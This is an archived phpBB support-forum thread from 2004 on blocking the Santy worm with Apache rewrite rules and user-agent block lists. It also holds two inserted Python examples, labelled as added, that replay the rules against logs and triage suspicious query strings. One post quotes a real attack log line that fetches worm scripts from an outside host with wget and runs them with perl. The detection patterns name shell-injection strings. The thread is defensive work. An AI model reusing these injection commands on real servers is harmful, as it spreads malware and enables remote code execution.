Apache forbidden rule for Santy.A worm

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.

Post by tanrek » Mon Dec 27, 2004 9:49 am

pengrus wrote:

Code:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
I am trying to implement this on our system, but could someone explain what the above code does?


That code does nothing because it's not complete. The complete code could be (filters all worm attacks on my system at this moment = ca. 150000 per day!):

Code:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*highlight=\%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$ - [F]
If your system allows this rewrite directive, your Apache will answer all URLs containing 'highlight=%2527' and all user agents beginning with 'lwp' or 'LWP' with 410 errors, which can save a lot of bandwidth.

This is not meant to be a protection of your system, because hackers or new worms might bypass this trick. It only helps to lower traffic. Also keep in mind that the Rewrite Engine might open new security issues, and it should be shut down as soon as possible when these attacks are over.

Post by larsneo » Mon Dec 27, 2004 9:55 am

Some additions to tighten security and to lower traffic:

Code:

RewriteEngine On

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
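To see what the rules tanrek and larsneo posted above actually do to a request before they go into .htaccess, here is an added example (not code from the thread, from phpBB or from Apache): a small Python simulator that parses the posted RewriteCond/RewriteRule lines and replays them against constructed access-log lines, including one legitimate forum search that uses highlight= and must not be blocked. It supports only the syntax the thread uses (%{VAR} test strings, [NC]/[OR] on conditions, [F] and [R,L] on rules); the log lines, hosts and paths are made up, the function names are the example's own, and the [F] outcome is reported as the 403 Forbidden that flag produces. Like mod_rewrite, it matches conditions against the still-encoded query string, which is why %2527 appears literally in the patterns.

```python
"""Replay posted mod_rewrite blocking rules against access-log lines (added example)."""
import re

# Constructed log lines in Apache "combined" format (hosts and paths made up).
# The last line is a legitimate search using highlight= and must pass through.
ACCESS_LOG = """\
10.0.0.1 - - [27/Dec/2004:16:38:23 +0000] "GET /forum/viewtopic.php?t=1&highlight=%2527x HTTP/1.1" 200 28949 "-" "lwp-trivial/1.41"
10.0.0.2 - - [27/Dec/2004:16:38:24 +0000] "GET /forum/viewtopic.php?t=2&rush=%65%63%68o HTTP/1.1" 200 100 "-" "Mozilla/4.0"
10.0.0.3 - - [27/Dec/2004:16:38:25 +0000] "GET /forum/index.php HTTP/1.1" 200 100 "-" "LWP::Simple/5.8"
10.0.0.4 - - [27/Dec/2004:16:38:26 +0000] "GET /forum/profile.php?mode=editprofile&cmd=cd%20/tmp;wget%20host.example/x HTTP/1.1" 200 100 "-" "Mozilla/4.0"
10.0.0.5 - - [27/Dec/2004:16:38:27 +0000] "GET /forum/viewtopic.php?t=3&highlight=santy HTTP/1.1" 200 100 "-" "Mozilla/5.0 (X11; Linux)"
"""

# tanrek's [F] rule followed by larsneo's redirect rule, as posted in the thread.
RULES = r"""
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*highlight=\%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$ - [F]
# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]
"""

# The truncated snippet quoted at the top of the thread: conditions, no rule.
TRUNCATED = r"""
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
"""

TOKEN = re.compile(r'(?:\\.|\S)+')   # whitespace split that keeps "\ " escapes together
LOG = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
                 r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$')


def _flags(tok):
    return tok[3].strip('[]').split(',') if len(tok) > 3 else []


def parse_rules(text):
    """Return (rules, warnings); each rule is (conditions, pattern, target, flags).
    A RewriteRule takes every RewriteCond that precedes it; conditions left over
    at the end guard nothing, which is tanrek's point about the truncated snippet."""
    rules, pending, warnings = [], [], []
    for line in text.splitlines():
        tok = TOKEN.findall(line)
        if not tok or tok[0].startswith('#'):
            continue
        if tok[0] == 'RewriteCond':
            pending.append((tok[1].strip('%{}'), tok[2], _flags(tok)))
        elif tok[0] == 'RewriteRule':
            if pending and 'OR' in pending[-1][2]:
                warnings.append('[OR] on the last RewriteCond leaves the chain open')
            rules.append((pending, tok[1], tok[2], _flags(tok)))
            pending = []
    if pending:
        warnings.append('%d RewriteCond lines are not followed by a RewriteRule' % len(pending))
    return rules, warnings


def conds_hold(conds, req):
    """mod_rewrite chaining: conditions AND together, except that [OR] joins a
    condition to the next one into a group of which one member must match.
    A chain whose last condition still carries [OR] never closes its group, so
    the rule fires even when nothing matched; parse_rules warns about that."""
    group_ok = False
    for var, pattern, flags in conds:
        ic = re.IGNORECASE if 'NC' in flags else 0
        group_ok = group_ok or re.search(pattern, req.get(var, ''), ic) is not None
        if 'OR' in flags:
            continue
        if not group_ok:
            return False
        group_ok = False
    return True


def apply_rules(rules, req):
    """HTTP status the request would receive, or None if it passes untouched."""
    for conds, pattern, target, flags in rules:
        if re.search(pattern, req['REQUEST_URI']) and conds_hold(conds, req):
            if 'F' in flags:
                return 403      # [F]: 403 Forbidden, no redirect round trip
            if 'R' in flags:
                return 302      # [R]: client is redirected to `target`
    return None


def parse_log_line(line):
    m = LOG.match(line)
    if not m:
        return None
    path, _, query = m['uri'].partition('?')   # conditions see the still-encoded query
    return {'ip': m['ip'], 'REQUEST_URI': path, 'QUERY_STRING': query,
            'HTTP_USER_AGENT': m['ua'], 'HTTP_COOKIE': ''}


def replay(rules_text=RULES, log_text=ACCESS_LOG):
    """Map each log line's client address to the status the rules would give it."""
    rules, _ = parse_rules(rules_text)
    result = {}
    for line in log_text.splitlines():
        req = parse_log_line(line)
        if req:
            result[req['ip']] = apply_rules(rules, req)
    return result


if __name__ == '__main__':
    for ip, status in replay().items():
        print(ip, status or 'passes')
    print(parse_rules(TRUNCATED)[1])
```

Running it shows the first and third constructed requests (double-encoded highlight, LWP user agent) getting 403 from tanrek's rule, the second and fourth (encoded "ech", wget%20) being redirected by larsneo's rule, and the legitimate highlight=santy search passing; the truncated snippet from the top of the thread parses to zero rules and a warning. The user-agent prefix lists posted later in the thread are ordinary RewriteCond lines and parse the same way. Before deploying a rule set, replay a day of real logs through it and look at what it would have blocked, not only at what it catches.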


Post by Narwhal » Mon Dec 27, 2004 1:52 pm

I want to thank rcardona and The Master for their posts. Without them we'd be offline. It was my first phpBB file edit; the regular Admin was unable to get online.


Post by RonS » Mon Dec 27, 2004 6:19 pm

BZebra wrote: If anyone knows how I could rewrite the highlight-links in the forum (removing the highlight-part via bbcode.php), please let me know!!

BZebra
This topic will show you how to remove the highlight code from your viewtopic.php and/or search.php, if I understand your question correctly.

http://www.phpbb.com/phpBB/viewtopic.ph ... 86#1366686

Good luck.


Post by GertDichniksan » Mon Dec 27, 2004 6:31 pm

Hi people,

our forum enjoys a high search engine ranking and therefore we were hit hard by the xmas worm wave. We used the usual measures to deal with the requests from infected servers (since we had requests from up to 800 servers at the same time, we used a script that adds attacking servers to iptables in order to keep the logfiles tidy). So far so good!

Some time ago, I noticed requests that didn't use 'highlight' to issue commands:

Code:

XXX.166.130.120 - - [27/Dec/2004:16:38:23 +0000] "GET /main/forum/viewtopic.php?t=3668/profile.php?mode=editprofile&sid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 28949
Question: Is this just non-working code or are there exploitable bugs I'm not aware of?

Cheers
Gert


Post by tanrek » Mon Dec 27, 2004 6:47 pm

GertDichniksan wrote:

Code:

/main/forum/viewtopic.php?
t=3668/profile.php?mode=editprofile&sid=http://www.visualcoders.net/spy.gif?...
Question: Is this just non-working code or are there exploitable bugs I'm not aware of?


This code was working. The malicious code was downloaded by the above primary script, e.g. as spy.gif (a Perl script!). However, the leak in www.visualcoders.net has been shut down already.


Post by GertDichniksan » Mon Dec 27, 2004 7:30 pm

Tanrek,

thanks for your reply. Sorry, I've got to come back to my question!

This code, unlike the thousands of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!

Cheers


Post by tanrek » Mon Dec 27, 2004 7:45 pm

GertDichniksan wrote: This code, unlike the thousands of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!


There is a new generation of worms which attacks all kinds of php scripts and seeks different vulnerabilities. Some of them e.g. try to call wget, but only bloody beginners will have wget lying around in their webspace... At the moment this type of worm uses the user agent string lwp* (see RewriteCond above).


Post by The_Master » Mon Dec 27, 2004 7:47 pm

GertDichniksan wrote: This code, unlike the thousands of other examples I've seen, uses editprofile instead of viewtopic. I don't understand why the attacker expects this to work!


This worm does not only target phpBB. It tries to inject that code into every php script, on any parameter it can find. Although it (AFAIK) doesn't work on phpBB, there are many php scripts that lack proper checks of input parameters and so are vulnerable to these attacks.

So if you use other scripts, you may want to check if they are secure too.
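As a defender's complement to the signature rules posted earlier in the thread, here is an added example (not code from the thread or from phpBB). Because mod_rewrite matches the still-encoded query string, rush=%65%63%68 and rush=echo need separate conditions; a check that decodes every parameter value first, whatever the parameter is called, treats both the same way, catches the cmd= variant Gert logged, and flags double-encoded values such as highlight=%2527 while letting a normal highlight= search through. The query strings are constructed for the example (hosts are placeholders), and the command and separator lists are the example's own heuristics, not anything phpBB ships.

```python
"""Decode-first triage of query-string parameters (added example, not from the thread)."""
import re
from urllib.parse import unquote, unquote_plus

# Heuristic lists for this example: command names seen in the worm requests
# quoted in the thread, and the shell separators that chain them.
COMMANDS = {'cd', 'wget', 'curl', 'lynx', 'perl', 'echo', 'system', 'chmod'}
SEPARATORS = re.compile(r'[;|`]|&&')

# Constructed query strings modelled on the requests discussed in the thread
# (hosts are placeholders).  The last two are legitimate and must not be flagged.
SAMPLES = {
    'santy':  't=1&highlight=%2527x',
    'newgen': 'mode=editprofile&sid=http://host.example/a.gif?'
              '&cmd=cd%20/tmp;wget%20host.example/b.txt;perl%20b.txt',
    'search': 't=3&highlight=santy',
    'fp':     'q=wget+tips&page=2',
}


def parameters(query):
    """Split on '&' only and decode each name/value once, as PHP's $_GET does."""
    for part in query.split('&'):
        name, _, value = part.partition('=')
        yield unquote_plus(name), unquote_plus(value)


def decode_fully(value, limit=3):
    """Keep percent-decoding until the value stops changing.  Returns the final
    value and how many extra layers were removed: one or more means the client
    sent a double-encoded value, which is exactly what highlight=%2527 is."""
    layers = 0
    while layers < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value, layers


def suspicious(value):
    """Reason a decoded value looks like a shell command chain, or None.
    A lone command word is not enough (a search for "wget tips" is legitimate):
    it must be chained with a separator or be given a path/URL argument."""
    segments = [s.strip() for s in SEPARATORS.split(value.lower())]
    for seg in segments:
        words = seg.split()
        if words and words[0] in COMMANDS and (
                len(segments) > 1 or (len(words) > 1 and '/' in words[1])):
            return 'shell command chain: ' + seg[:40]
    return None


def triage(query):
    """Return [(parameter, reason)] for every parameter that looks hostile."""
    findings = []
    for name, once in parameters(query):
        value, layers = decode_fully(once)
        reason = suspicious(value)
        if reason is None and layers:
            reason = 'double-encoded value (%d extra layer(s))' % layers
        if reason:
            findings.append((name, reason))
    return findings


if __name__ == '__main__':
    for label, query in SAMPLES.items():
        print(label, triage(query) or 'clean')
```

The double-encoding signal is deliberately separate from the command-chain signal: a forum search for a quote character arrives single-encoded (highlight=%27) and is not flagged, while %2527 only makes sense to a client that wants the application, not the web server, to do the second decode. Clients that double-encode by accident exist, so treat that finding as a reason to look at the request rather than as proof of an attack.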


Post by GertDichniksan » Mon Dec 27, 2004 9:58 pm

@tanrek & The_Master,

thanks!

@tanrek

You don't need lynx or wget to download code from a web server!

Out-of-the-box installations often include gawk. A little bit of inline gawk-code can download a perl script (or a bigger gawk-script).

Switching off command execution from php would be a safer approach.

Cheers
Gert


Post by usrbingeek » Tue Dec 28, 2004 6:08 pm

This code combines larsneo's rules with a filter on the most popular bandwidth-hog clients.

Code:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} FrontPage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^Irvine [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]


Post by Xpert » Tue Dec 28, 2004 7:10 pm

Guys, feel free to comment this one:
[RC] Anti-Net-Worm.Perl.Santy
http://www.phpbb.com/phpBB/viewtopic.ph ... 90#1371390


Post by The_Master » Tue Dec 28, 2004 7:37 pm

Xpert wrote: Guys, feel free to comment this one:
[RC] Anti-Net-Worm.Perl.Santy
http://www.phpbb.com/phpBB/viewtopic.ph ... 90#1371390


Hmmm: http://www.phpbb.com/phpBB/viewtopic.ph ... 41#1368441

Btw. use "==" or "!=" but not "!==" ;).


Post by Xpert » Tue Dec 28, 2004 7:44 pm

2The_Master
let's discuss the mod in its thread
!== because strpos needs it.


Post by The_Master » Tue Dec 28, 2004 7:52 pm

Xpert wrote: 2The_Master
let's discuss the mod in its thread


There's nothing to discuss for me, as I'm using my own version of it, which works quite well here and also stops newer versions of Santy, which do not (only) try the highlight exploit. At least until they learn to mask the user agent ;).
Xpert wrote: !== because strpos needs it.


Ok. Never used strpos() much before, because strstr() seems to be faster on my local machine.
